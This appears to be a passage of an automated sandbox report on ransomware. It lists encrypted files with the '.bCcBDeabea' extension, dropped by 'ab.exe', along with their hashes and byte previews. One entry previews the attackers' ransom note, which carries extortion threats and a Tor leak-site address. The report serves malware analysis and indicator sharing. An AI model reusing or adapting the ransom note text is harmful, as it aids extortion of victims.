Preview:	... 0T....(....\|".8....]E..q...E#Nsb..`.K.....]....fw......':i......m.%.ey...k.KzM!f.:........:..a...`.6.U`....q.Xe..:_.....">w.^.9.....{..ogT...V.<.....d.. .1z,:...).I...!.r.Q........B.E...z..n.C..).d.=...z...-&>..."."...?.Y.....G...W.9Ir_vL...GH....<s..B...............tG....<...[].Y.%..^....\|..LX.......K-......5Y9c`..k..%Ru..0.rh.~.Y..]..tx87......"&..^.....Q....:,..".k..Bbq.N..5L...Tz.......>..,H...V.....S...z.....nu.c....eNNX.z.r4J........h..S...>......6..%+.Ug...F...-K0..#N...0Kz..Q.8...W..W.....G.>.../.{..q..ud.. r..n...f..{.D80..f........o0......:"..:..<..>=UP.....>.w.i.......N...... ...<...?.W...[.H....O..Q...[..,.....v.+..C _?UO.uHqj..:;/.,.....k I.~nk.>-F.aUf..<B.......b.h...,d.>...`.2...D;,...H.....1 J.L..pCR.r...[...{...F.3<~....._X.PE.1(..r..(.O%.~......@KJ..^./..>/S6&...gbM.b.@...*..a.f\|.....G..,<.4...S..v..j....~Oh..NQ# ........C..@....7.N.7r...(.FS.o...9.].V....?Y..DC4\|.,...%....:....C..DGH+.E}....9Se...~.2d.V..m.-..'...

C:\Users\user\Desktop\GAOBCVIQIJ\SUAVTZKNFL.pdf Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978330090145761
Encrypted:	false
SSDEEP:	192:vijpo83leNhNMK4InRTvSvBanabdIxmaSp6rkw36aenC1SV+n:+oaw20n5R0zIrkw36tC1n
MD5:	322AADF19704F30D6C34E1306D999F7A
SHA1:	C21E12D241E367155C160442C326DC64605B2E92
SHA-256:	D9BE2336917E7F36FA8E269D90C60AF0341E289D95D24475E321DFDAC1DA4D5C
SHA-512:	6037EC13C7C42F6E98DBD1D3C2ACE6581837C9515C3CF017D6592C26A107E870FDC5AE80C25099863DCEB8D562B8A8418D44315394FD522D066105A14DD3D2BB
Malicious:	false
Preview:	.'}....B....&.U.U.......-.X&....".M.0...P..5.D..............8...Q.e..o....,..$....Q..R...+R..$M.V....'3P}....7I~..C.Y..:...=Vyy..).--..a\|.....-.\.\.7 ....r.>3._.]I.j...PH..w.p;H....f..k.I...+....B.XbFH.a...y.F.z).n.<p@..).rn.]Y.G(..#M.ByT..Dk.R..L(h......Z....;vN.AP...#..w...........^..q.. .K.-..2@.......\.].W....LB.@ ..[r.. 4.......M....'.v....<O+(&..uj......8.#..-.v.P(...t!...f /3n.u.]p.y..F.4..o.Q;...... )..>..[P.6............svg.S...w.+....N....0y`......[..._./!.,f8M".u...T........t...)...,2).^.y>FK.!v6&\.i..\|]....+......W..hA.!k.......y..+N.;8f....!)....0ud...k....0.....s.i.r..)..g8....f.....A6.m..%...< pbws...{.w..6s....n...b....n.+j..h.,..E..L..a...sF,.N4.. .X{..1K.\......KW`.!..t.S...}K]q!8m.....a.FX..g.....7."P....O#.K.0.=..=._!~.^..&...9.q.F...z...-..p1.0..k......Ih......[".....iE.]c..Q.5g.....'JB...G..a....'...v....k.1c........Zr`.0lJR7....,.....D.F.[.x.....!..{.......$DW..p..C@...q....C.....$qI.NG.q3..~<VI. ....&R....... .-c.i..._.

C:\Users\user\Desktop\GAOBCVIQIJ\SUAVTZKNFL.pdf.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978330090145761
Encrypted:	false
SSDEEP:	192:vijpo83leNhNMK4InRTvSvBanabdIxmaSp6rkw36aenC1SV+n:+oaw20n5R0zIrkw36tC1n
MD5:	322AADF19704F30D6C34E1306D999F7A
SHA1:	C21E12D241E367155C160442C326DC64605B2E92
SHA-256:	D9BE2336917E7F36FA8E269D90C60AF0341E289D95D24475E321DFDAC1DA4D5C
SHA-512:	6037EC13C7C42F6E98DBD1D3C2ACE6581837C9515C3CF017D6592C26A107E870FDC5AE80C25099863DCEB8D562B8A8418D44315394FD522D066105A14DD3D2BB
Malicious:	false
Preview:	.'}....B....&.U.U.......-.X&....".M.0...P..5.D..............8...Q.e..o....,..$....Q..R...+R..$M.V....'3P}....7I~..C.Y..:...=Vyy..).--..a\|.....-.\.\.7 ....r.>3._.]I.j...PH..w.p;H....f..k.I...+....B.XbFH.a...y.F.z).n.<p@..).rn.]Y.G(..#M.ByT..Dk.R..L(h......Z....;vN.AP...#..w...........^..q.. .K.-..2@.......\.].W....LB.@ ..[r.. 4.......M....'.v....<O+(&..uj......8.#..-.v.P(...t!...f /3n.u.]p.y..F.4..o.Q;...... )..>..[P.6............svg.S...w.+....N....0y`......[..._./!.,f8M".u...T........t...)...,2).^.y>FK.!v6&\.i..\|]....+......W..hA.!k.......y..+N.;8f....!)....0ud...k....0.....s.i.r..)..g8....f.....A6.m..%...< pbws...{.w..6s....n...b....n.+j..h.,..E..L..a...sF,.N4.. .X{..1K.\......KW`.!..t.S...}K]q!8m.....a.FX..g.....7."P....O#.K.0.=..=._!~.^..&...9.q.F...z...-..p1.0..k......Ih......[".....iE.]c..Q.5g.....'JB...G..a....'...v....k.1c........Zr`.0lJR7....,.....D.F.[.x.....!..{.......$DW..p..C@...q....C.....$qI.NG.q3..~<VI. ....&R....... .-c.i..._.

C:\Users\user\Desktop\GAOBCVIQIJ\uCLrcwQ_readme_.txt Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	ASCII text, with very long lines, with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	3758
Entropy (8bit):	5.730064789432486
Encrypted:	false
SSDEEP:	48:L9k0ZzV7L/vNbXGZULVDgUp4qNiiE6bm1c0rfWejhAe/YAliM3PXnLHrYxgkH69e:L95zhLNbXGZUe7Ka6pU6i9fLrvE69USC
MD5:	41F60F7F111C974C7727BBFA483C63C2
SHA1:	18587F9751EAAE7C5C779A9BE2FF619CD2625C11
SHA-256:	9C9D056AC514D49FFAD38C17ADDCCD3DFC4C55132C944DDF76A4BB08A4137D51
SHA-512:	AC7F11B160C98750B14C4AF6926A02BBC4D42C17BD9A44316DF861CA7BA94BB3FA8C956794C63049F64B341D3EFFCD24601533250633D8BEA585221082D3C1CD
Malicious:	false
Preview:	-------=== Your network has been infected! ===-------.........*************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************.........All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabea......You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!......The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!......We have also downloaded a lot of private data from your network....If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.......You can get more information on our page, which is located in a Tor hidden network..........How to get to our page...----------------------------------------------------------------------------

C:\Users\user\Desktop\LSBIHQFDVT.docx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.98012572202099
Encrypted:	false
SSDEEP:	192:hKs+JKiO/BAwuyYdcK4EQ2TDWgusQUs0p7QrFp9IqKCb/rPqV+n:hJ/H3YrhvTRusbs0pI9nZXP
MD5:	739539EBC633007778F01BF49AB86DA3
SHA1:	8C5E0628C38BC14C548F2759B7185B6E899BC8D9
SHA-256:	66C629C5A5E4313B71F31C079E8D69BE02348EE78C5CB80EBF96C913B1D7024F
SHA-512:	E0D2E88608B324DAA050E575F0EE4861D9F257915A8F79C42230A3DD7483A6DAF53BFC2F4FBD98F697E819AEB11E683655571A3147E5709E2B36BFF1D3D6609A
Malicious:	false
Preview:	....5Bf.&.........l./...u...L1.\|....A...:.;..l^.7e.38$"..~....2.!Y...w?).f..Ut.1....d78....B..].b..e;..iA."D..d.h.\|u.b"$.. ...I..x.I.5.n7QkhE./h..k.n0h..2*6..M^fF&...(.......]9....a....K.z..PrA[3.........\|@...d@..3...z..#}L.........K........gHR..o+..[......-.n...{.......tp8n...YI.u.3S.s.'y.d".i.`.b.0.Y.h2.=.....u.22L..a..Z..cu)P.P..rK.$.(.?.k.........H.V.w..........i.....o^{...-.~.G._.SG3H.-.....X'..f%.....lj.UW...;.........[j...d...M2J...T..,..Wf...X...,.uEK..'^.,.7z.P...{.}.p..LH..o..........^..A\|....Th....G..+.B..G..).....fq.......\|Vbs>v.y.%.....Y..&&...%.WA....{.,.;..UTJ[..gW.4{.E.\.p..d..S:.#Q..[..s....QY....'w.I{....g...z......F.=.r.F.f..~o.0g.K..r..e`....e....x!.m....o.i&fm.H.W~w.$}L7Lx.H..l.B%...._.N.....s..)..gf.R...yj.%.....7..c....9.....?c..._V@..v-Gr..CA....E....z...Aw..{.."O......z...d?0y..#O..(..e...}.8..=...8..&Zv.N.o.\.n......`.K....r...};'k.n._..E....!..4C..<...7bEN".7.........%.%..nA#..1.}1.+w...Z..2VN............\|...#M.+9..w

C:\Users\user\Desktop\LSBIHQFDVT.docx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.98012572202099
Encrypted:	false
SSDEEP:	192:hKs+JKiO/BAwuyYdcK4EQ2TDWgusQUs0p7QrFp9IqKCb/rPqV+n:hJ/H3YrhvTRusbs0pI9nZXP
MD5:	739539EBC633007778F01BF49AB86DA3
SHA1:	8C5E0628C38BC14C548F2759B7185B6E899BC8D9
SHA-256:	66C629C5A5E4313B71F31C079E8D69BE02348EE78C5CB80EBF96C913B1D7024F
SHA-512:	E0D2E88608B324DAA050E575F0EE4861D9F257915A8F79C42230A3DD7483A6DAF53BFC2F4FBD98F697E819AEB11E683655571A3147E5709E2B36BFF1D3D6609A
Malicious:	false
Preview:	....5Bf.&.........l./...u...L1.\|....A...:.;..l^.7e.38$"..~....2.!Y...w?).f..Ut.1....d78....B..].b..e;..iA."D..d.h.\|u.b"$.. ...I..x.I.5.n7QkhE./h..k.n0h..2*6..M^fF&...(.......]9....a....K.z..PrA[3.........\|@...d@..3...z..#}L.........K........gHR..o+..[......-.n...{.......tp8n...YI.u.3S.s.'y.d".i.`.b.0.Y.h2.=.....u.22L..a..Z..cu)P.P..rK.$.(.?.k.........H.V.w..........i.....o^{...-.~.G._.SG3H.-.....X'..f%.....lj.UW...;.........[j...d...M2J...T..,..Wf...X...,.uEK..'^.,.7z.P...{.}.p..LH..o..........^..A\|....Th....G..+.B..G..).....fq.......\|Vbs>v.y.%.....Y..&&...%.WA....{.,.;..UTJ[..gW.4{.E.\.p..d..S:.#Q..[..s....QY....'w.I{....g...z......F.=.r.F.f..~o.0g.K..r..e`....e....x!.m....o.i&fm.H.W~w.$}L7Lx.H..l.B%...._.N.....s..)..gf.R...yj.%.....7..c....9.....?c..._V@..v-Gr..CA....E....z...Aw..{.."O......z...d?0y..#O..(..e...}.8..=...8..&Zv.N.o.\.n......`.K....r...};'k.n._..E....!..4C..<...7bEN".7.........%.%..nA#..1.}1.+w...Z..2VN............\|...#M.+9..w

C:\Users\user\Desktop\LSBIHQFDVT\GAOBCVIQIJ.pdf Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.977759643434391
Encrypted:	false
SSDEEP:	192:KvSX/nSnUW8C1RaELeOObCwJg2GlaRQu1EuZNWWqqYkQujxe+InCUV+n:V+HfRJ6DJJgflaRQuqufaquujE+6CF
MD5:	566F47657935E7EC6EAA7E780573DBED
SHA1:	A0500C4C040ACD6BFED5B8068BC991F6B69D75E3
SHA-256:	D691942ED928C974C10BCD4402FBA1F6023A836648E8A660F9D6E74812B74002
SHA-512:	2DF146053D06CDE9238C9630772084C8B5E7BE96162C0BC3508A1313F2D4DD38A4FD031C90F4207A8AFCE3FF59FDAF93591CA53EFC3AFA9A696231E2B77ACA32
Malicious:	false
Preview:	......a.G..-........G.Fs.K~X~.\|..N...j..... ...SZ:.^0.)D...D..D....(..H.?m.....?..;'G.....>bc.,.T.z....6....NQ...[C...xT.%....w.......y..Y..._.Z.=l\...........$1.............n.r...>.;...I...M.,.n........q.c...h...]...A...c.58r^...N......P...I....M..l.V.QI....,.._....r.......&....j.`.v...r..Yg...vIv..^.j.....N.............q.\|.0.....!..D\.H....>iZ....o....'...8I.k.$.v.\..U..>...yU..v...:9.t.>.B....s.'Yq....5.B(..6.e..bL....G.WBlh=..5.........r}..Xp....k...,. .[L...W.g.....%....L S0....E.%S...............[/..r.y.A.o//........2......rS...{.........U....x......j>P'....\|....g$b._...r/.E...&g...m..;u.;.z...P...N.[Dl...U. ..\|..#;....M-....u;....W..A.y.rL`.m.Za...S9..<.!X..YB..."....w.f.<C.......(^4y.n.9..r,..G....xW...6B8Qc.pzc......0ef.........cUU..s...nP...uCD...t)sT..5.n..;......l..f...z..)G)./.9.~.D....d..-...Q.'KK.'%.a....<..c...F7.]..[.X5..T..f..Q>..e...pi.p"....S<=....'*E.L.....]..+a.Y]&.)..1...@&....?....4.!....).A....!.D ..`@..w$...

C:\Users\user\Desktop\LSBIHQFDVT\GAOBCVIQIJ.pdf.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.977759643434391
Encrypted:	false
SSDEEP:	192:KvSX/nSnUW8C1RaELeOObCwJg2GlaRQu1EuZNWWqqYkQujxe+InCUV+n:V+HfRJ6DJJgflaRQuqufaquujE+6CF
MD5:	566F47657935E7EC6EAA7E780573DBED
SHA1:	A0500C4C040ACD6BFED5B8068BC991F6B69D75E3
SHA-256:	D691942ED928C974C10BCD4402FBA1F6023A836648E8A660F9D6E74812B74002
SHA-512:	2DF146053D06CDE9238C9630772084C8B5E7BE96162C0BC3508A1313F2D4DD38A4FD031C90F4207A8AFCE3FF59FDAF93591CA53EFC3AFA9A696231E2B77ACA32
Malicious:	false
Preview:	......a.G..-........G.Fs.K~X~.\|..N...j..... ...SZ:.^0.)D...D..D....(..H.?m.....?..;'G.....>bc.,.T.z....6....NQ...[C...xT.%....w.......y..Y..._.Z.=l\...........$1.............n.r...>.;...I...M.,.n........q.c...h...]...A...c.58r^...N......P...I....M..l.V.QI....,.._....r.......&....j.`.v...r..Yg...vIv..^.j.....N.............q.\|.0.....!..D\.H....>iZ....o....'...8I.k.$.v.\..U..>...yU..v...:9.t.>.B....s.'Yq....5.B(..6.e..bL....G.WBlh=..5.........r}..Xp....k...,. .[L...W.g.....%....L S0....E.%S...............[/..r.y.A.o//........2......rS...{.........U....x......j>P'....\|....g$b._...r/.E...&g...m..;u.;.z...P...N.[Dl...U. ..\|..#;....M-....u;....W..A.y.rL`.m.Za...S9..<.!X..YB..."....w.f.<C.......(^4y.n.9..r,..G....xW...6B8Qc.pzc......0ef.........cUU..s...nP...uCD...t)sT..5.n..;......l..f...z..)G)./.9.~.D....d..-...Q.'KK.'%.a....<..c...F7.]..[.X5..T..f..Q>..e...pi.p"....S<=....'*E.L.....]..+a.Y]&.)..1...@&....?....4.!....).A....!.D ..`@..w$...

C:\Users\user\Desktop\LSBIHQFDVT\LSBIHQFDVT.docx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.982073770414174
Encrypted:	false
SSDEEP:	192:+snS+fRzILRt9YdRfnAMgxdt589GpyxNVOEpgJHMMRaDP4QwThV+n:+wRJMLP9otgdG0I7EEGJHMhDAN+
MD5:	5EC97A3E7E0D953E1C1F8F22150C2A35
SHA1:	804139297A367617AA27AE73B68CA49D81613965
SHA-256:	A1B9C8E42CC60E5BEE088283CEFC38E4DFBABA1C5E11C7122DFADC98E0BC1E14
SHA-512:	A830FB2A2DAFFD9AB9F6A7A19455F1122A47B1165662735DB6CD984C085D8AAF730D481BDBAD0AFCB7523338A3D8B3FD6DBD24B2257CE3634FBBFBC562BDAAA1
Malicious:	false
Preview:	....W.)Hk...:;..~.\|.I;.2qeK(m,....q...V.o..g.~.i...C...&.O@9....Hvn.P..vSdUF.W..$....R...c.7!..7.?...Q.cl......>...-....Em...r3..NxG.A...`....$...pb.b.`......x.U...t....n..kjHO.....Z......v$...U<O.!..SI....:G.H].).M....W.p..o) .B...9..G..6a....i.GeB"bi..........k..........+(xa.....f..9.][.K.s...O6.kI.A{p...HE~...'$.?..t..[.}.'.s'u.......:....G.^..4.6.y..g.a......]..VH.6...h`<.........$..k.#....d'..\|.....{N....^7".n..`=Yn..rB,...G...i.= .L6.=~.%k..L....k.n....=.3...[....X}..Q,.?...p.R..l.6..[}I..)4t'...QJ4..9......e.O?.5... ...&........`...V.\|.....-..M@8....q..S.]9.o..j.l_.9a..k/.j.lb..:s.=..r.E..-.%[y..9.(2..<..5.l........./>g.c..[@..@.<.,.Y.....J])?....Z...Vy1..^>.>T$n.C..O....&..1..".D&tyf........w).n...(A..u.@2..;J=.0db.,....b.M.......b..+ak.@m...:...+"'Z.oF.N\.b[_.r69=/J...`2VQn..h[i'..^2..M..^i..'8..e;n.@\|D.e.2\|..{..Q..a-.`..%.Z..)'^`.>B#b\....7....ffb..........d.+........}.../..&...Q.-....=...@.W0...Q...>.w?~.;.9...Zs.?=.o...dH..f

C:\Users\user\Desktop\LSBIHQFDVT\LSBIHQFDVT.docx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.982073770414174
Encrypted:	false
SSDEEP:	192:+snS+fRzILRt9YdRfnAMgxdt589GpyxNVOEpgJHMMRaDP4QwThV+n:+wRJMLP9otgdG0I7EEGJHMhDAN+
MD5:	5EC97A3E7E0D953E1C1F8F22150C2A35
SHA1:	804139297A367617AA27AE73B68CA49D81613965
SHA-256:	A1B9C8E42CC60E5BEE088283CEFC38E4DFBABA1C5E11C7122DFADC98E0BC1E14
SHA-512:	A830FB2A2DAFFD9AB9F6A7A19455F1122A47B1165662735DB6CD984C085D8AAF730D481BDBAD0AFCB7523338A3D8B3FD6DBD24B2257CE3634FBBFBC562BDAAA1
Malicious:	false
Preview:	....W.)Hk...:;..~.\|.I;.2qeK(m,....q...V.o..g.~.i...C...&.O@9....Hvn.P..vSdUF.W..$....R...c.7!..7.?...Q.cl......>...-....Em...r3..NxG.A...`....$...pb.b.`......x.U...t....n..kjHO.....Z......v$...U<O.!..SI....:G.H].).M....W.p..o) .B...9..G..6a....i.GeB"bi..........k..........+(xa.....f..9.][.K.s...O6.kI.A{p...HE~...'$.?..t..[.}.'.s'u.......:....G.^..4.6.y..g.a......]..VH.6...h`<.........$..k.#....d'..\|.....{N....^7".n..`=Yn..rB,...G...i.= .L6.=~.%k..L....k.n....=.3...[....X}..Q,.?...p.R..l.6..[}I..)4t'...QJ4..9......e.O?.5... ...&........`...V.\|.....-..M@8....q..S.]9.o..j.l_.9a..k/.j.lb..:s.=..r.E..-.%[y..9.(2..<..5.l........./>g.c..[@..@.<.,.Y.....J])?....Z...Vy1..^>.>T$n.C..O....&..1..".D&tyf........w).n...(A..u.@2..;J=.0db.,....b.M.......b..+ak.@m...:...+"'Z.oF.N\.b[_.r69=/J...`2VQn..h[i'..^2..M..^i..'8..e;n.@\|D.e.2\|..{..Q..a-.`..%.Z..)'^`.>B#b\....7....ffb..........d.+........}.../..&...Q.-....=...@.W0...Q...>.w?~.;.9...Zs.?=.o...dH..f

C:\Users\user\Desktop\LSBIHQFDVT\PWCCAWLGRE.mp3 Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.980014852290303
Encrypted:	false
SSDEEP:	192:2TaJO0KUgFyXJSWyDw3rxlIDTbskzmZJC4Be5mxRNlwNargOn4fV+n:2WJ9xNyw7bIDXskzm+4Y5MNlwgsOn4I
MD5:	C399C6ED9CFC02A25FF1550CAA31B8CE
SHA1:	3AD30F5B51A29B51BAC7562582DB1C1E2A81FDFD
SHA-256:	666D944652028581FC5DFEAFACBAD7F796B2B22CB29516667C69BF0F00616624
SHA-512:	85E2C998D880AFC9213528319185E26C17B3AAF3B2B4CCBDF7C535C9EA6E7905735E7430594B96096C027918BE434329422BE55ED346F284E15DA5142CD2429A
Malicious:	false
Preview:	....~P..S.x....!.M.a.`....g....]CF+d...b..}.L.....c(.~....3.?... .I.W}.x..rpxW.... ...Y...'.A.'...S...l../...G.{.....,.y.....].)D..c.g.9.F....Q......C..),.iB...5..O.P...;Pp..=........{.C....z (....%..t....LzT..\|)v<.....Fo....5........\|.......m4&.....o....\..+x ZM./........p..z...M.{...-...#.k1...4..#...N.D.Q..qZln..9..t.T....B..}..~OL.w......p.e^.......Eg...d..TU..:[u......f7M,.w+Q........H{.c....;"..)=.].6....>..DqGM.!..od.b..a.F...g[.$.GYT...z.dG..P}.m{&ji9.8=.+..z7q.L+..G....P]...G..}bs...F.{FM5-.....r....g.\|.a..6....o=.......m..S..q.Y&.1....{.......L..+..?..0..\..<}......^MRg.~oh,..*..Q....^..<...?.g\..K.W._t.$F.."..>.>W8".3$.a..9n...ZvG.h.Ls..A....iN..."..P._VN./....z=c.$mm...@...6:.!.1...:.F.....:..../..H{f..5....F...n.3.E0..CJ..]....2,....y.. ../................+...Q==}....>......6.]?...`.X.."..).../......."..H.....T7..]("..Tz.\L.j.K...W0......[Y.....P.q\|9..Q..W.S...tm...$.P.N..I..\..:..,.q....x.I......%....e.Q)J~ .7

C:\Users\user\Desktop\LSBIHQFDVT\PWCCAWLGRE.mp3.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.980014852290303
Encrypted:	false
SSDEEP:	192:2TaJO0KUgFyXJSWyDw3rxlIDTbskzmZJC4Be5mxRNlwNargOn4fV+n:2WJ9xNyw7bIDXskzm+4Y5MNlwgsOn4I
MD5:	C399C6ED9CFC02A25FF1550CAA31B8CE
SHA1:	3AD30F5B51A29B51BAC7562582DB1C1E2A81FDFD
SHA-256:	666D944652028581FC5DFEAFACBAD7F796B2B22CB29516667C69BF0F00616624
SHA-512:	85E2C998D880AFC9213528319185E26C17B3AAF3B2B4CCBDF7C535C9EA6E7905735E7430594B96096C027918BE434329422BE55ED346F284E15DA5142CD2429A
Malicious:	false
Preview:	....~P..S.x....!.M.a.`....g....]CF+d...b..}.L.....c(.~....3.?... .I.W}.x..rpxW.... ...Y...'.A.'...S...l../...G.{.....,.y.....].)D..c.g.9.F....Q......C..),.iB...5..O.P...;Pp..=........{.C....z (....%..t....LzT..\|)v<.....Fo....5........\|.......m4&.....o....\..+x ZM./........p..z...M.{...-...#.k1...4..#...N.D.Q..qZln..9..t.T....B..}..~OL.w......p.e^.......Eg...d..TU..:[u......f7M,.w+Q........H{.c....;"..)=.].6....>..DqGM.!..od.b..a.F...g[.$.GYT...z.dG..P}.m{&ji9.8=.+..z7q.L+..G....P]...G..}bs...F.{FM5-.....r....g.\|.a..6....o=.......m..S..q.Y&.1....{.......L..+..?..0..\..<}......^MRg.~oh,..*..Q....^..<...?.g\..K.W._t.$F.."..>.>W8".3$.a..9n...ZvG.h.Ls..A....iN..."..P._VN./....z=c.$mm...@...6:.!.1...:.F.....:..../..H{f..5....F...n.3.E0..CJ..]....2,....y.. ../................+...Q==}....>......6.]?...`.X.."..).../......."..H.....T7..]("..Tz.\L.j.K...W0......[Y.....P.q\|9..Q..W.S...tm...$.P.N..I..\..:..,.q....x.I......%....e.Q)J~ .7

C:\Users\user\Desktop\LSBIHQFDVT\QCFWYSKMHA.png Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.979869139483104
Encrypted:	false
SSDEEP:	192:S/MgHFtWhobuXqMLkl4jjBcCCiGulkuvNJ3DXNoD2faJV+n:SEgHFCob/4kMjBcCbGul9J3SWaW
MD5:	A01805CBA96EEA193DD185B472AB0687
SHA1:	F2EBB66D34AD7C4B16A0E306A62B7A9D29993920
SHA-256:	00F05D157EC5F6088A21EACFD09503010F8250D1A35B1C90FFF592FDEA3DA951
SHA-512:	5B30ED7D037C772F8C1ECB42CC18BC22AB4715916D9823666B4D244DAA94C130FA784BC669D98972987846CE55A3766650206AD5C6226384C95E3591F0C79E80
Malicious:	false
Preview:	._..Q\..hq+>.KU../^N.. ..<Kgux.4I3...Q%.J.y..R.....q1....K ...2..a._.3X.C`....W.........O....:.!.9..".'R0.".$7...H..YFI.6sh........b.<....r3[...t?;..........%.s.V.^..@`.........6.."q}DxtQ.y .0.:......Q........[.s...\|.#......Kl..V.=..LnvyD.M.......Fl..m..Y..../...q.5L.X-..b.l....(..h..p.=.r..... ....vA.S.....'.QZ^....._.w.p1..o.!...M.e......2..PTu....PF..A......+>.....C\|BWi.5"..n...a.I....6.C+..4..-R~%.Iq..:.k..fc./... S.'0~.F..}.L!.S]z....{.U......I.R._......-..k2.$.:}.....I..N.-MH.W....+....}L...OY..e...........mk.-...O\|...f......R./.......E. ...o......~....E5......m...!O.. ..X.........P...<8.....r...6S.^....5.k-_jn.#0..W..^....Z.K..8]....>.c..#(..g.'.n..tQ.[.....!..4.hQ?/....#..y'..Oh.....g......gXC...n...G.......b..v,.T...`=Zr...a~...b..~.$KL.....w.'_.......'u.kj]!.2...N....G>F.\|,...L.a....)..c.V!zS+......n.....ir8.M...7.n.x.Xj.o..X..3..<e.v...A. ....iJ.~......{..;.q..Nq.(1rGm.&.64...^.m.......T6A........N.:..H..DC..

C:\Users\user\Desktop\LSBIHQFDVT\QCFWYSKMHA.png.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.979869139483104
Encrypted:	false
SSDEEP:	192:S/MgHFtWhobuXqMLkl4jjBcCCiGulkuvNJ3DXNoD2faJV+n:SEgHFCob/4kMjBcCbGul9J3SWaW
MD5:	A01805CBA96EEA193DD185B472AB0687
SHA1:	F2EBB66D34AD7C4B16A0E306A62B7A9D29993920
SHA-256:	00F05D157EC5F6088A21EACFD09503010F8250D1A35B1C90FFF592FDEA3DA951
SHA-512:	5B30ED7D037C772F8C1ECB42CC18BC22AB4715916D9823666B4D244DAA94C130FA784BC669D98972987846CE55A3766650206AD5C6226384C95E3591F0C79E80
Malicious:	false
Preview:	._..Q\..hq+>.KU../^N.. ..<Kgux.4I3...Q%.J.y..R.....q1....K ...2..a._.3X.C`....W.........O....:.!.9..".'R0.".$7...H..YFI.6sh........b.<....r3[...t?;..........%.s.V.^..@`.........6.."q}DxtQ.y .0.:......Q........[.s...\|.#......Kl..V.=..LnvyD.M.......Fl..m..Y..../...q.5L.X-..b.l....(..h..p.=.r..... ....vA.S.....'.QZ^....._.w.p1..o.!...M.e......2..PTu....PF..A......+>.....C\|BWi.5"..n...a.I....6.C+..4..-R~%.Iq..:.k..fc./... S.'0~.F..}.L!.S]z....{.U......I.R._......-..k2.$.:}.....I..N.-MH.W....+....}L...OY..e...........mk.-...O\|...f......R./.......E. ...o......~....E5......m...!O.. ..X.........P...<8.....r...6S.^....5.k-_jn.#0..W..^....Z.K..8]....>.c..#(..g.'.n..tQ.[.....!..4.hQ?/....#..y'..Oh.....g......gXC...n...G.......b..v,.T...`=Zr...a~...b..~.$KL.....w.'_.......'u.kj]!.2...N....G>F.\|,...L.a....)..c.V!zS+......n.....ir8.M...7.n.x.Xj.o..X..3..<e.v...A. ....iJ.~......{..;.q..Nq.(1rGm.&.64...^.m.......T6A........N.:..H..DC..

C:\Users\user\Desktop\LSBIHQFDVT\QNCYCDFIJJ.jpg Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.976243017495167
Encrypted:	false
SSDEEP:	192:H3tO90IFcemEsETYhqGZwaUA67YqXEz4FmaCTNbDV+n:W0xem/1ZUo8TFlCBb0
MD5:	45C14B3608A85F81FDB9826258B3A2EF
SHA1:	6EC31E06CE0D4E5788FF3C06C8FE0680C4883DB1
SHA-256:	D05C6A4EBEAFDCC076CD3F15FD0588D2F51917BEE7936383F846F6F4D5C4C5D4
SHA-512:	9D4B75874A91717265EEDB5B13015A23B8FA39B4C5E0A015AC08DE56AA7C0F062EDC76748C873793F83509F07839AD6E0FFC3DBAC70BF080F04D148D84CB4A6E
Malicious:	false
Preview:	.q....aX....o.rfv^..G.z...m...................S.(.-.M.V....4.I..X...V...c.2.?....]..M...vn).....&_.b0....:.KJ.r.....2....oc.fu........NP.(..e."...W..H....~..;.Nx.B...P...".[.NM.+j..R...f..r7+./)K.L.S..;.O.z.j..>..7.Nni.6.~...>8.%..s.aQ.....D.=..nR~....rp.......U.....3...r5;.'..V\..!Q..5.0>>E.....g.V.+.hl'..V.<..~sSQ.c.^...fs4+.R7'.......y~;T.;.._.l.>..r(...2r.\C}.'D..=y...S.[.,L[.1..4YJ.wm.."...........A.5.G]...z>.R...'.O....%...^.'A.D^A.....\S..e...M8..p...M.=.._..z...q...A..5. /Iq.BN.N.....N.a..e\..G..:e..~....JW.....f.Z\|<P....4l..rV...>>...&.~..9=....&...=..wLZVG..6j,S.W"R..S..@.K9.-....}2n$..f#...H.-Cp.g.......<].YSi...F..jt.K.A.>..khe./X...<.fc.,.X....]!.0....L........M..C@...0.X.#x#u.3.CA.....9..X.B.1..6L.LR<...^.....H,d.....7....1.Hn.x.!.+..v..>....-.X..w.D.els..y..%..)\|.8.,....x..%.9..q+..O..F`R.u...w[.rt.........Q.bzc.jU..^[J.-.-..I..l.'.<..~;%.w..0.5....1-.Y......).W..s....9.~.V...C.....'j....q...)G-.............v.....+...

